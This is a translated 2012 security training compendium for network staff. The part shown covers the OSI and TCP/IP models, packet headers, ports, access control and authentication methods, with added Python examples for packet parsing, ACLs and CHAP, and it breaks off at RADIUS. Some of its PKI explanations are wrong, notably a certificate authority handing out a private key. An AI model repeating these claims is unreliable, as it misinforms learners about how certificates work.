
TOCBATDAT SECURITY COMPENDIUM

Security Compendium, Version 1.2, 2012

Page | 1 Copyright by Tocbatdat

Security Document, Version 1, 2012

7, 2012

CHANGE HISTORY
Version   Updated   Updated by        Note
1         7/2012    Hoàng Tuấn Đạt    First Release


TABLE OF CONTENTS

I. PURPOSE AND SCOPE OF THE DOCUMENT ........ 9
   1. Purpose of the document ........ 9
   2. Scope of the document ........ 9

II. OVERVIEW OF NETWORK SECURITY (SECURITY OVERVIEW) ........ 10
   1. Basic concepts of information security (security) ........ 11
   2. Network fundamentals ........ 11
      a. The OSI network model ........ 11
      b. The TCP/IP network model ........ 17
      c. Comparison of the TCP/IP and OSI models ........ 19
      d. Structure of IP, TCP, UDP and ICMP packets ........ 19
      e. Commonly used ports ........ 22
      f. Using a sniffer to analyze IP, ICMP, UDP and TCP packets ........ 22
      g. Analyzing individual packets and whole sessions ........ 22
   3. Access control concepts (Access Controls) ........ 23
      a. Access control systems ........ 23
      b. Principles for configuring access control ........ 24
      c. Types of access control ........ 24
   4. Authentication concepts ........ 27
      a. Factors for identifying and authenticating users ........ 27
      b. Authentication methods ........ 27
   5. Authorization ........ 31
      a. Authorization basics ........ 31
      b. Authorization methods ........ 31
   6. Accounting concepts ........ 33
   7. The CIA security triad ........ 34
      a. Confidentiality ........ 34
      b. Integrity ........ 35
      c. Availability ........ 35
   8. Cryptography basics ........ 36
      a. Basic cryptography concepts ........ 36
      b. Hash functions ........ 36
      c. Symmetric encryption ........ 37
      d. Asymmetric encryption ........ 37
      e. PKI overview ........ 39
      f. Hands-on encryption and decryption with cryptography tools ........ 42
   9. Basic concepts of network attacks ........ 42
      a. Basic steps of an attack ........ 42
      b. Some security concepts ........ 44
      c. Basic attack methods ........ 44
      d. Goals of the various attack types ........ 45

III. INFRASTRUCTURE SECURITY ........ 47
   1. Solutions and roadmap for building network infrastructure security ........ 48
   3. Designing a secure network model ........ 50
   4. Routers and switches ........ 51
      a. Router functions ........ 51
      b. Switch functions ........ 52
      c. Switch security ........ 52
      d. Router security ........ 52
      e. Configuring router security ........ 53
   5. Firewalls and proxies ........ 58
      a. Firewall concept ........ 58
      b. Firewall functions ........ 58
      c. How a firewall works ........ 59
      d. Firewall types ........ 60
      e. Firewall placement in the network design ........ 61
   6. Configuring the iptables firewall on Linux ........ 64
   7. Installing and configuring Squid as a proxy server ........ 68
      a. Linux Squid proxy server ........ 68
      b. Installation ........ 68
      c. Configuring Squid ........ 70
      d. Starting Squid ........ 72
   8. Deploying a VPN on OpenVPN ........ 74
      a. OpenVPN overview ........ 74
      b. Deploying OpenVPN with SSL on Ubuntu Linux ........ 75
   9. Using a VPN to protect a Wi-Fi system ........ 82
      a. Wi-Fi security methods ........ 82
      b. Configuring the access point and VPN Server 2003 ........ 83
      c. Creating VPN connections from devices accessing via Wi-Fi ........ 95
   10. Intrusion detection and prevention systems (IDS/IPS) ........ 100
      a. Packet analysis principles ........ 100
      b. Installing and configuring Snort as an IDS/IPS ........ 104
   11. Installing and configuring Sourcefire IPS ........ 111
      a. Features of the Sourcefire IPS ........ 111
      b. Typical IDS/IPS deployment model ........ 113
      c. How the Sourcefire IDS/IPS works ........ 114
      d. Setting management parameters for Sourcefire devices ........ 117
      e. Upgrading Sourcefire devices ........ 118
      f. Configuring system settings ........ 118
      g. Setting up centralized management for Sourcefire devices ........ 122
      h. Configuring interface sets and detection engines ........ 124
      i. Managing and configuring IPS policies ........ 127
      j. Analyzing IPS events ........ 143
   12. Endpoint security ........ 147
      a. The Kaspersky Open Space Security (KOSS) solution ........ 147
      b. Features of the Kaspersky Endpoint Security package ........ 148
      c. Lab: installing KSC and Endpoint Security on workstations ........ 149
   13. Data loss prevention ........ 149
   14. Network access control ........ 151
   15. Operating system security ........ 154
      a. Securing Windows ........ 154
      b. Lab: using IPsec policy to protect applications on Windows ........ 156
      c. Securing Linux ........ 156
   16. Network security policy ........ 159
      a. Requirements for building a network security policy ........ 159
      b. Overview of the policy-building process ........ 159
      c. The ISMS ........ 160
      d. The ISO 27000 series ........ 161

IV. APPLICATION SECURITY ........ 164
   1. Securing DNS ........ 164
      a. Using DNS forwarders ........ 164
      b. Using caching-only DNS servers ........ 165
      c. Using DNS advertisers ........ 165
      d. Using DNS resolvers ........ 166
      e. Protecting the DNS cache ........ 166
      f. Securing connections with DDNS ........ 166
      g. Disabling zone transfers ........ 167
      h. Using a firewall to control DNS access ........ 167
      i. Setting access controls on the DNS registry entries ........ 167
      j. Setting access controls on the DNS file system entries ........ 168
   2. Securing web applications ........ 168
      a. Introduction ........ 168
      b. Vulnerabilities in web services ........ 168
      c. Exploiting OS-level vulnerabilities and securing the web server ........ 169
      d. Exploiting web service vulnerabilities ........ 171
      e. Exploiting the DoS vulnerability in Apache 2.0.x-2.0.64 and 2.2.x-2.2.19 ........ 173
      f. Exploiting web application vulnerabilities ........ 173
   3. Mail server security ........ 175
      a. Overview of SMTP, POP and IMAP ........ 175
      b. Attack risks when using email ........ 185
   4. Remote access security ........ 187
   5. Buffer overflow vulnerabilities and countermeasures ........ 187
      a. Theory ........ 187
      b. Technical description ........ 188
      c. Basic example ........ 188
      d. Stack-based buffer overflow ........ 188
      e. Example source code ........ 189
      f. Exploitation ........ 190
      g. Preventing buffer overflows ........ 191
      h. Practice ........ 194

V. DATA SECURITY ........ 194
   1. Database security ........ 194
      a. Database security violations ........ 195
      b. Database security levels ........ 195
      c. Privileges when using a database system ........ 196
      d. Views as a protection mechanism ........ 197
      e. Granting access privileges ........ 198
      f. Audit trails ........ 201
   2. Statistical database monitoring ........ 201
   3. Database security methods ........ 208

VI. NETWORK ASSESSMENT AND ANALYSIS TOOLS ........ 212
   1. Open port scanning skills ........ 212
      a. TCP/IP communication principles ........ 212
      b. Principles of port scanning a system ........ 214
      c. Port scanning with Nmap ........ 216
   2. Scanning for OS vulnerabilities ........ 219
      a. Using Nmap to scan for OS vulnerabilities ........ 219
      b. Using Nessus to scan for OS vulnerabilities ........ 220
      c. Using GFI to scan for OS vulnerabilities ........ 228
   3. Scanning for web vulnerabilities ........ 231
      a. Using Acunetix to scan for web vulnerabilities ........ 232
      b. Lab: using IBM AppScan to scan for web vulnerabilities ........ 234
   4. Packet analysis and network sniffing techniques ........ 234
      a. The nature of sniffers ........ 234
      b. A professional data analysis model for enterprises ........ 235
      c. Hub environments ........ 236
      d. Sniffing in switched environments ........ 236
      e. Sniffer model using ARP attack tools ........ 239
   5. The Metasploit exploitation tool ........ 240
      a. Metasploit overview ........ 240
      b. Using the Metasploit Framework ........ 242
      c. Conclusion ........ 248
   6. Using Wireshark and Colasoft for packet analysis ........ 248
      a. Using Wireshark to analyze packets and network traffic ........ 248
      b. Using Colasoft to analyze network traffic ........ 252

VII. CONCLUSION ........ 259


Glossary of terms used in the document

No.   Term       Full form
1     ATTT       An toàn thông tin (information security)
2     Security   Bảo mật (security)
(rows 3 to 15 of the glossary were not recovered from the source)


I. PURPOSE AND SCOPE OF THE DOCUMENT

1. Purpose of the document
This is an information security training document for the network operations and administration staff of ABC. It provides trainees with a complete set of concepts, system models, deployment configurations for security solutions, risk management, and much other knowledge about information security.

2. Scope of the document
This document is written specifically for the information security course for ABC staff.


II. OVERVIEW OF NETWORK SECURITY (SECURITY OVERVIEW)

1. Basic concepts of information security (security)
2. Network fundamentals
3. Access control concepts (Access Controls)
4. Authentication concepts
5. Authorization
6. Accounting concepts
7. The CIA security triad
8. Cryptography basics
9. Basic concepts of network attacks


1. Basic concepts of information security (security)

Several large organizations around the world define Security (information security) as follows:

- Information security is the degree to which information is protected against the threats of disclosure, loss of integrity, and loss of availability.
- Information security is the degree of protection against risks to information security such as danger, damage, loss, and other crimes.
- Security is the form and degree of protection of information, including the structures and processes that improve security.
- The Institute for Security and Open Methodologies defines security as a form of protection in which a separation is created between assets and threats.

2. Network fundamentals
a. The OSI network model
When an application or a service operates to serve users' need to exchange information, the network operates so that the exchange takes place according to its own rules. Looking at a network cable or at wireless equipment, a person cannot understand the rules by which information is transmitted. To make these rules and principles easy to understand, for research, application development, and network troubleshooting, the international standards body adopted the OSI model as an ISO standard. The OSI model (Open Systems Interconnection Reference Model, abbreviated OSI Model or OSI Reference Model) is a layered design that abstractly describes the technique of communication between computers and the design of the network protocols between them. The model was developed as part of the Open Systems Interconnection initiative started by ISO and ITU-T. It is also called the seven-layer OSI model. (Source: Wikipedia.)


Purpose of the OSI model: the OSI model divides the functions of a protocol into a series of layers. Each layer has the property that it uses only the functions of the layer below it, and in turn exposes its own functions only to the layer above it. A system that implements protocols as such a series of layers is called a "protocol stack". A protocol stack can be implemented in hardware, in software, or in a combination of both. Typically only the lower layers are implemented in hardware, while the other layers are implemented in software.

The OSI model is respected only to a limited degree by the networking and IT industry. Its main feature is that it specifies the interfaces between layers, that is, the way the layers communicate with one another. This means that even when the layers are written and designed by different vendors or companies, they will work together once assembled (assuming the specifications have been interpreted correctly). In the TCP/IP community these specifications are known as RFCs (Requests for Comments); in the OSI community they are ISO standards.

Usually the implementation of a protocol is arranged in layers, following the layering of the protocol specification, but there are exceptions, known as "fast paths". In a fast-path design, the most common transactions the system permits are implemented as a single component in which the functions of several layers are merged into one.

A sensible division of protocol functions makes it easier to reason about the function and behaviour of protocol stacks, which in turn makes it possible to design detailed, carefully specified stacks with high reliability. Each layer performs and provides services to the layer directly above it, and requires the services of the layer directly below it. As noted above, an implementation covering several layers of the OSI model is usually called a protocol stack (for example, the TCP/IP protocol stack).

The OSI reference model is a hierarchical structure of 7 layers that defines the requirements for communication between two computers. The model was defined by the International Organization for Standardization in standard 7498-1


(ISO standard 7498-1). The purpose of the model is to allow interoperability between the diverse platforms supplied by different vendors. The model lets all components of a network work together regardless of who built them. In the late 1980s, ISO recommended implementing the OSI model as a networking standard. At that time TCP/IP had already been in widespread use for many years. TCP/IP was the foundation of ARPANET and of the other networks that evolved into the Internet. (See RFC 871 for the main differences between TCP/IP and ARPANET.) Today only part of the OSI model is in use. Many people believe that most of the OSI specifications are too complex and that fully implementing their functions would take far too long, however enthusiastic the model's supporters may be.

Details of the OSI layers:

Layer 1: Physical layer. The physical layer defines all the electrical and physical specifications for devices, including pin layouts, voltages, and cable specifications. Physical-layer devices include hubs, repeaters, network adapters, and host bus adapters (HBAs, used in storage area networks). The basic functions and services performed by the physical layer include:
- Establishing or terminating an electrical connection


(electrical connection) with a transmission medium.
- Taking part in the process by which communication resources are shared efficiently among multiple users, for example contention resolution and flow control.
- Modulation, that is, conversion between the digital data representation used by user equipment and the corresponding signals transmitted over the communication channel.

The parallel SCSI bus operates at this layer. The various Ethernet physical-layer standards also belong to this layer; Ethernet merges the physical layer and the data link layer into one. The same is true of local area networks such as Token Ring, FDDI, and IEEE 802.11.

Layer 2: Data link layer. The data link layer provides the functional and procedural means to transfer data between network entities and to detect, and possibly correct, errors that occur in the physical layer. Addressing is physical: the address (the MAC address) is hard-coded into network cards when they are manufactured. This addressing scheme is flat (non-hierarchical). Note: the most typical example is Ethernet. Other examples of data link protocols are HDLC and ADCCP for point-to-point or packet-switched networks, and the Aloha protocol for local area networks. In IEEE 802 local area networks, and in some other networks such as FDDI, the data link layer may be split into two sublayers: the MAC (Media Access Control) sublayer and the LLC (Logical Link Control) sublayer, per IEEE 802.2. The data link layer is where bridges and switches operate. Connectivity is provided only between nodes connected within the local network. There is, however, a reasonable argument that these devices really belong to "layer 2.5" rather than purely to layer 2.


Layer 3: Network layer. The network layer provides the functions and procedures for transferring variable-length data sequences from a source to a destination across one or more networks, while maintaining the quality of service requested by the transport layer. The network layer performs routing. Routers operate at this layer, sending data across extended networks and making internetworking possible (there are also layer-3 switches, also called IP switches). This is a logical addressing scheme whose values are chosen by the network engineer, and it is hierarchical. The typical example of a layer-3 protocol is IP.

Layer 4: Transport layer. The transport layer provides a dedicated service for transferring data between end users, so that the upper layers need not concern themselves with providing reliable and efficient data transfer. The transport layer controls the reliability of a given connection. Some protocols are state- and connection-oriented, meaning that the transport layer can track packets and retransmit those that fail. A typical example of a layer-4 protocol is TCP. This is the layer where messages are turned into TCP or UDP packets. At layer 4, addressing is done with port numbers, which distinguish the applications exchanging data.

Layer 5: Session layer. The session layer controls the dialogues (sessions) between computers. It establishes, manages, and terminates connections between local and remote applications. It also supports full-duplex, half-duplex, or simplex operation and provides checkpointing, which speeds up recovery after an error because the completed point has already been marked, as well as adjournment, termination, and restart. The OSI model assigns this layer responsibility for the graceful close of sessions (a property of TCP) and for session checking and recovery, a part that is usually not used in the TCP/IP protocol suite.


Layer 6: Presentation layer. The presentation layer acts as the data layer on the network. On the sending computer it translates the data sent from the Application layer into a common format; on the receiving computer it converts the common format back into the Application layer's format. The presentation layer performs the following functions:
- Translating character codes, for example from ASCII to EBCDIC.
- Converting data, for example from integers to floating-point numbers.
- Compressing data to reduce the amount transmitted over the network.
- Encrypting and decrypting data to ensure security on the network.

Layer 7: Application layer. The application layer is the layer closest to the user. It provides the means for users to access information and data on the network through application programs. This layer is the main interface through which the user interacts with the application and, through it, with the network. Examples of applications at this layer include Telnet, the File Transfer Protocol (FTP), the Simple Mail Transfer Protocol (SMTP), HTTP, and X.400 Mail remote.

Figure: an easy-to-understand illustration of the OSI model alongside real-world forms of information exchange.


b. The TCP/IP network model

TCP/IP (in English: the Internet protocol suite, IP suite, or TCP/IP protocol suite) is a set of communication protocols that implements the protocol stack on which the Internet and most commercial computer networks run. The suite is named after its two main protocols, TCP (Transmission Control Protocol) and IP (Internet Protocol). They were also the first two protocols to be defined. Like many other protocol suites, the TCP/IP suite can be viewed as a set of layers, each of which solves a set of problems related to data transmission and provides the protocols of the layer above with a well-defined service built on the services of the lower layers. Logically, the upper layers are closer to the user and work with more abstract data; they rely on the protocols of the lower layers to transform that data into forms that can eventually be transmitted physically.


The OSI model describes a fixed set of 7 layers that some vendors chose to adopt, and it can be compared loosely with the TCP/IP suite. The comparison can cause confusion, or it can bring a deeper understanding of the TCP/IP suite.

Application layer: includes the applications DNS, TFTP, TLS/SSL, FTP, HTTP, IMAP, IRC, NNTP, POP3, SIP, SMTP, SNMP, SSH, TELNET, ECHO, BitTorrent, RTP, PNRP, rlogin, ENRP, ... Routing protocols such as BGP and RIP run, for various reasons, over TCP and UDP respectively (BGP uses TCP, RIP uses UDP) and can be considered part of either the application layer or the network layer.

Transport layer: includes the protocols TCP, UDP, DCCP, SCTP, IL, RUDP, ... Routing protocols such as OSPF (Open Shortest Path First), which run over IP, can also be considered part of the transport layer or of the network layer. ICMP (Internet Control Message Protocol) and IGMP (Internet Group Management Protocol) run over IP and can be considered part of the network layer.

Network layer: the protocols IP (IPv4, IPv6). ARP (Address Resolution Protocol) and RARP (Reverse Address Resolution Protocol) operate below IP but above the link layer, so they can be said to sit somewhere between the two layers.


Link layer: includes the protocols Ethernet, Wi-Fi, Token Ring, PPP, SLIP, FDDI, ATM, Frame Relay, SMDS, ...

c. Comparing the TCP/IP and OSI models


The TCP/IP model is simpler than the OSI model yet still represents the process of communication on the network. The TCP/IP model is divided into 4 layers:

OSI Model          TCP/IP Model
7. Application     4. Application
6. Presentation
5. Session
4. Transport       3. Transport
3. Network         2. Internet
2. Data Link       1. Network Access
1. Physical

d. Structure of the IP, TCP, UDP and ICMP packets


To support security research, one must clearly understand the structure of the packets at each layer in order to understand and analyse them.

Encapsulation of information across the layers of the TCP/IP model:


Structure of the IPv4 packet: this is the structure of the IPv4 packet, consisting of a Header and Data. The Header comprises 160 or 192 bits; the remainder is Data. The address field is 32 bits.

Structure of the IPv6 packet: the IPv6 packet also consists of two parts, Header and Data. The packet Header comprises 40 octets (320 bits), of which the IPv6 address is 128 bits.

Structure of the TCP packet:


The TCP packet consists of two parts, Header and Data, in which the Header is 192 bits.

Three steps to open a TCP connection:
+ Step I: The client sends the server a SYN packet
+ Step II: The server replies to the client with a SYN/ACK packet
+ Step III: When the client receives the SYN/ACK it sends the server an ACK packet, and the exchange of data between the two hosts begins.

Four steps to close a TCP connection:
+ Step I: The client sends the server a FIN ACK packet
+ Step II: The server sends the client an ACK packet
+ Step III: The server in turn sends the client a FIN ACK packet
+ Step IV: The client sends the server an ACK packet, and the disconnection between server and client is complete.

Structure of the UDP packet: the UDP packet consists of two parts, Header and Data, in which the Header is 64 bits.


Structure of the ICMP packet:
Type (8 bits) [8 bits identifying the ICMP type]
Code (8 bits) [each Type may have its own specific codes describing the variant]
Checksum (16 bits) [16-bit checksum]
Message (variable length) [depends on the type and code]
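The header layouts above, decoded from raw bytes the way a sniffer does before displaying a packet. This is an added example, not code from the original document; the sample packets are constructed with the small helper functions at the end.

```python
"""Added example: parse IPv4, TCP, UDP and ICMP headers from raw bytes.
The packets used below are constructed here, not captured."""
import socket
import struct


def parse_ipv4(raw: bytes) -> dict:
    """Parse the fixed 20-byte (160-bit) IPv4 header; IHL tells us if options extend it."""
    if len(raw) < 20:
        raise ValueError("truncated IPv4 header")
    ver_ihl, _tos, total_len, _ident, _flags, ttl, proto, _csum, src, dst = \
        struct.unpack("!BBHHHBBH4s4s", raw[:20])
    ihl = (ver_ihl & 0x0F) * 4          # header length in bytes (20 without options)
    if ver_ihl >> 4 != 4 or ihl < 20 or len(raw) < ihl:
        raise ValueError("not a valid IPv4 header")
    return {
        "version": ver_ihl >> 4,
        "header_len": ihl,
        "ttl": ttl,
        "protocol": proto,              # 1 = ICMP, 6 = TCP, 17 = UDP
        "src": socket.inet_ntoa(src),
        "dst": socket.inet_ntoa(dst),
        "payload": raw[ihl:total_len],
    }


TCP_FLAGS = {0x01: "FIN", 0x02: "SYN", 0x04: "RST", 0x08: "PSH", 0x10: "ACK", 0x20: "URG"}


def parse_tcp(raw: bytes) -> dict:
    """Parse the TCP header: ports, sequence numbers and the flag bits that drive
    the three-way handshake (SYN, SYN/ACK, ACK) and the four-way close (FIN/ACK)."""
    sport, dport, seq, ack, off_res, flags, _win, _csum, _urg = \
        struct.unpack("!HHIIBBHHH", raw[:20])
    data_off = (off_res >> 4) * 4       # header length in bytes
    return {
        "src_port": sport, "dst_port": dport, "seq": seq, "ack": ack,
        "flags": [name for bit, name in sorted(TCP_FLAGS.items()) if flags & bit],
        "payload": raw[data_off:],
    }


def parse_udp(raw: bytes) -> dict:
    """Parse the 8-byte (64-bit) UDP header."""
    sport, dport, length, _csum = struct.unpack("!HHHH", raw[:8])
    return {"src_port": sport, "dst_port": dport, "length": length, "payload": raw[8:length]}


def parse_icmp(raw: bytes) -> dict:
    """Parse the ICMP header: Type (8 bits), Code (8 bits), Checksum (16 bits), then the message."""
    icmp_type, code, csum = struct.unpack("!BBH", raw[:4])
    return {"type": icmp_type, "code": code, "checksum": csum, "message": raw[4:]}


def parse_packet(raw: bytes) -> dict:
    """Decode an IP packet and the layer-4 header it carries into one dict."""
    ip = parse_ipv4(raw)
    decoders = {1: ("icmp", parse_icmp), 6: ("tcp", parse_tcp), 17: ("udp", parse_udp)}
    if ip["protocol"] in decoders:
        name, fn = decoders[ip["protocol"]]
        ip[name] = fn(ip["payload"])
    return ip


def build_ipv4(proto: int, src: str, dst: str, payload: bytes) -> bytes:
    """Constructed-sample helper: wrap a payload in an IPv4 header (checksum left zero)."""
    hdr = struct.pack("!BBHHHBBH4s4s", 0x45, 0, 20 + len(payload), 1, 0x4000, 64,
                      proto, 0, socket.inet_aton(src), socket.inet_aton(dst))
    return hdr + payload


def build_tcp(sport: int, dport: int, flags: int, seq: int = 0, ack: int = 0) -> bytes:
    """Constructed-sample helper: a 20-byte TCP header with the given flag bits."""
    return struct.pack("!HHIIBBHHH", sport, dport, seq, ack, 5 << 4, flags, 65535, 0, 0)


# Constructed sample: step I of the handshake, a SYN from a client to port 80.
SYN_PACKET = build_ipv4(6, "192.0.2.10", "192.0.2.80", build_tcp(40000, 80, 0x02, seq=1000))

if __name__ == "__main__":
    pkt = parse_packet(SYN_PACKET)
    print(pkt["src"], "->", pkt["dst"], pkt["tcp"]["flags"], "port", pkt["tcp"]["dst_port"])
```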

e. Some commonly used ports


So that many services can communicate at the same time over one connection, each service uses a fixed port. When studying security we should also know the ports that are commonly used:

Protocol         Port
FTP              20/21
SSH              22
Telnet           23
SMTP             25
DNS              53
TFTP             69
HTTP             80
POP3             110
SNMP             161/162
HTTPS            443
SMB              445
NetBIOS          135,137,139
VPN              1723,500
Remote Desktop   3389

f. Using a sniffer tool to analyse IP, ICMP, UDP and TCP packets.
Practice: install Wireshark and Colasoft to analyse packets.

g. Analysing individual packets and whole connection sessions


Practice: install Wireshark and Colasoft to analyse packets.


3. The concept of access control (Access Controls).


Before being granted any privileges, everyone accesses the system as the Anonymous user. Once a user has been authenticated (Authentication), the system grants them privileges to use resources (Authorization), and the user's entire access activity is monitored and recorded (Accounting).

a. Access Control Systems


Resources may only be accessed by authenticated individuals. Managing a user's access to resources goes through these steps:

Identification: the process of identifying the user; the user supplies information that lets the system identify them.
Authentication: the step of verifying the user; the user supplies information confirming their identity, and the system verifies it by one of many methods.
Authorization: the privileges to access resources that the system grants the user after Authentication.
Accounting: the system monitors and records the user's access to resource areas.

All access control systems must have three basic elements:

Subjects: all entities that can be granted access rights; these can be thought of as the Users/Groups in the system.
Objects: the resources being used.
Access Permissions: used to grant Subjects access to Objects (for example a User is a Subject, a folder is an Object, and the Permission is the right granted to the User to access the Folder).

The table of Access Permissions for one object is called an Access Control List (ACL); the ACLs of the whole system are recorded in the table of Access Control Entries (ACEs).


b. Principles for setting up Access Control


Whoever writes the security policy must set out principles for administering system resources that ensure the greatest security for the resources while still letting users do their work. The principles are:

Principle of Least Privilege: users (Subjects) are granted the minimum permissions on resources (Objects) that still allow them to do their work.
Principle of Separation of Duties and Responsibilities: important systems must be split into separate components so that control can be delegated sensibly.
Principle of Need to Know: users access only the resource areas that they need, and understand, for their work.

c. Types of Access Controls


Resources come in many forms and users come in many kinds, so we need to use appropriate forms of data access control.

Mandatory Access Control (MAC)
+ A rule-based control method that grants access rights to entities.
+ Rights are granted to entities based on dividing resources into different classes (classification of resources).
+ This access control method is typically applied in government organizations and companies.
+ Example: in a brewing company the resource areas are divided into Public (the website), Private (accounting data) and Confidential (the beer recipe). Each resource area has its own set of entities allowed to access it, and that access control is Mandatory Access Control.


Discretionary Access Control (DAC)
+ Users (Subjects) are controlled through ACLs.
+ Access to data can be split into different levels (for example NTFS Permissions, where Users/Groups are granted levels such as Full control, Modify and Read).
+ An Access Control List can be used when granting Permissions on resources, or on routers and firewalls. Using ACLs is the Discretionary Access Control method.

Access Control List table of NTFS Permissions:


Role-Based Access Control
+ The administrator grants rights to users based on their roles. A user's rights may be the tasks the user is allowed to perform on the system.
+ For example, the administrator may grant a User the rights Shutdown, change network settings, remote desktop, backup and others, based on the user's role.
+ In Microsoft Windows this access control method can be understood as assigning User Rights.
+ Example of setting a User Right on a Microsoft system:
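The three models just described, written as one small decision function so their differences can be checked: a MAC gate on classification, a DAC lookup in the object's ACL, and an RBAC lookup by role. This is an added example, not code from the original document; the subjects, objects, levels and roles are constructed from the brewery and Windows examples above.

```python
"""Added example: MAC, DAC and RBAC decisions side by side.
All subjects, objects and roles are constructed samples."""
from dataclasses import dataclass, field

# MAC: resources are classified; a subject may read only at or below its clearance.
LEVELS = {"Public": 0, "Private": 1, "Confidential": 2}


def mac_allows(clearance: str, classification: str) -> bool:
    """Rule-based check from the brewery example (website / accounting / recipe)."""
    return LEVELS[clearance] >= LEVELS[classification]


# DAC: each object carries an ACL; each ACE names a subject and its permission set.
@dataclass
class ACE:
    subject: str                      # a user or a group name
    permissions: frozenset            # e.g. {"read"}, {"read", "modify"}, {"full"}


@dataclass
class Obj:
    name: str
    classification: str
    acl: list = field(default_factory=list)   # the object's Access Control List


def dac_allows(user: str, groups: set, obj: Obj, perm: str) -> bool:
    """Walk the ACL; 'full' grants everything; no matching ACE means deny (least privilege)."""
    for ace in obj.acl:
        if ace.subject == user or ace.subject in groups:
            if "full" in ace.permissions or perm in ace.permissions:
                return True
    return False


# RBAC: rights follow from roles, as with Windows User Rights.
ROLE_RIGHTS = {
    "operator": {"shutdown", "backup"},
    "helpdesk": {"remote_desktop", "change_network_settings"},
}


def rbac_allows(roles: set, right: str) -> bool:
    return any(right in ROLE_RIGHTS.get(r, set()) for r in roles)


def check_access(user: str, groups: set, clearance: str, roles: set, obj: Obj,
                 perm: str = None, right: str = None) -> bool:
    """Combined decision: the MAC gate first, then the DAC permission, then the RBAC right."""
    if not mac_allows(clearance, obj.classification):
        return False
    if perm is not None and not dac_allows(user, groups, obj, perm):
        return False
    if right is not None and not rbac_allows(roles, right):
        return False
    return True


# Constructed sample objects from the brewery example.
RECIPE = Obj("beer_recipe.docx", "Confidential", [ACE("brewmasters", frozenset({"read"}))])
LEDGER = Obj("ledger.xlsx", "Private", [ACE("accounting", frozenset({"read", "modify"}))])
```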

In addition, Access Control can be divided into two forms:

Centralized Access Control (CAC)


Authentication and authorization are performed centrally for the whole system. Three commonly used centralized access control methods are:
+ Remote Authentication Dial-In User Service (RADIUS)
+ Terminal Access Controller Access Control System (TACACS)
+ Active Directory

Decentralized Access Control Systems (DACS)
A control method made up of many different CACs within an organization, integrated into different systems without depending on particular hardware or software.

Based on the actions taken on the system, Access Control can also be divided into:
+ Administrative Controls

4. The concept of Authentication


a. Factors for identifying and authenticating users
User authentication methods are based on these basic factors:
Something you KNOW - based on something you know (e.g. user/password)
Something you HAVE - based on something you have (e.g. to withdraw cash at an ATM you must have the card)
Something you ARE - based on something you are (e.g. fingerprint, voice)

b. Authentication methods


In practice there are quite a few methods of authenticating users in IT, and each kind may suit one or more services. Below I present some authentication methods commonly used in IT.


PAP - Password Authentication Protocol

PAP is used by remote users who need to authenticate over PPP connections. PAP provides the ability to identify and authenticate users when they connect from a remote system. This authentication protocol requires the user to enter a Password before being authenticated. The Username and Password are transmitted over the network after the PPP connection has been established. The authentication server holds the authentication data; the information the user enters is sent to this server. The entire Username/Password travels over the network completely unencrypted (cleartext).

CHAP - Challenge Handshake Authentication Protocol

CHAP is an authentication method created to overcome the weaknesses and vulnerabilities of PAP. CHAP uses a challenge/response method to authenticate users. When a user wants to establish a PPP connection, both sides must agree to use CHAP. The challenge is encrypted using the password and an encryption key. How CHAP works is described in the model below:
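The difference between the two protocols in code: what PAP puts on the wire, and the challenge/response that CHAP (RFC 1994) sends instead, with a fresh challenge per attempt so a captured response cannot be replayed. This is an added example, not code from the original document; the usernames and secrets are constructed.

```python
"""Added example: PAP versus CHAP (RFC 1994) on the wire.
Usernames and secrets are constructed."""
import hashlib
import hmac
import os


def pap_request(username: str, password: bytes) -> dict:
    """What PAP transmits: the password itself, readable by any sniffer on the path."""
    return {"username": username, "password": password}


def chap_response(identifier: int, secret: bytes, challenge: bytes) -> bytes:
    """RFC 1994 response value: MD5 over Identifier || secret || Challenge."""
    return hashlib.md5(bytes([identifier]) + secret + challenge).digest()


class ChapServer:
    """Holds the shared secrets and verifies responses; the secret never travels."""

    def __init__(self, secrets: dict):
        self._secrets = secrets        # username -> shared secret
        self._pending = {}             # identifier -> outstanding challenge
        self._next_id = 1

    def challenge(self) -> tuple:
        """Issue a fresh random challenge; the identifier ties the response to it."""
        ident = self._next_id
        self._next_id = (self._next_id + 1) % 256
        chal = os.urandom(16)
        self._pending[ident] = chal
        return ident, chal

    def verify(self, ident: int, username: str, response: bytes) -> bool:
        """Each challenge is consumed on first use, so a replayed response fails."""
        chal = self._pending.pop(ident, None)
        secret = self._secrets.get(username)
        if chal is None or secret is None:
            return False
        expected = chap_response(ident, secret, chal)
        return hmac.compare_digest(expected, response)   # constant-time compare


def chap_exchange(server: ChapServer, username: str, secret: bytes) -> bool:
    """One full round trip: challenge out, hashed response back, server decision."""
    ident, chal = server.challenge()
    on_the_wire = chap_response(ident, secret, chal)   # only the hash is sent
    return server.verify(ident, username, on_the_wire)
```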

Kerberos
An authentication method in which the User/Password is not transmitted over the network (for example, Microsoft Active Directory uses Kerberos authentication). Kerberos authentication can be described like going to the cinema:


+ First the user must have an authorized User/Password (to see a film you must have money)
+ The user requests a service (the viewer wants to see a film showing at a certain time)
+ The user presents their credentials to the authenticator (hands over money to buy a ticket)
+ The KDC server issues the user a credential for accessing the service (the ticket office hands the ticket to the buyer)
+ The user takes the issued credential to the service server (the viewer takes the ticket to the screening room, where the ticket checker inspects it).

Kerberos can be described in the following steps:

Multi-factor
Authentication using several factors. For example, to use a bank's ATM service you need the bank card plus the PIN (that is authentication based on 2 factors). Some services also combine several authentication methods to raise the level of security.

Certificate


An authentication method widely used on the Internet that provides secure authentication for users. When encrypted content is sent, only the Private Key can decrypt it, and the Private Key is normally never transmitted over the network. Example of the usual authentication process when a user accesses Gmail:

Step 1: The user accesses gmail.com
Step 2: Gmail sends information to VeriSign to obtain a Certificate
Step 3: VeriSign sends Gmail back the Certificate, comprising the Public Key and Private Key
Step 4: Gmail sends the user the Public Key to encrypt the authentication information
Step 5: The user encrypts with the Public Key and sends the result to Gmail
Step 6: Gmail decrypts with the Private Key

This authentication method is not safe when the machine is infected with malware such as a keylogger: the user can still lose their User/Password.

RSA
RSA is a more trusted and secure authentication method for authenticating and transmitting information on the Internet. RSA overcomes some drawbacks of Certificate authentication. It is the method often used for banking transactions.

Biometric


An authentication method that uses biometrics to identify the user, in forms such as fingerprint, vein pattern, iris, voice and face.

5. Authorization
a. Authorization basics
Authorization (Vietnamese: sự cấp quyền, the granting of rights) is the granting of rights to a user in a system after the user has authenticated (Authentication). Authorization expresses the rights a user may exercise on the system. Authorization works directly with Access Control. Example: in Windows authorization, after the user logs in (Authentication) the system grants rights over:
Files and folders, through NTFS Permissions: read, write, delete, modify. These are the privileges the user is granted over files and folders.
The system, through User Rights: rights to change the system, such as remote desktop, editing network card parameters, and so on.

b. Authorization methods


RADIUS
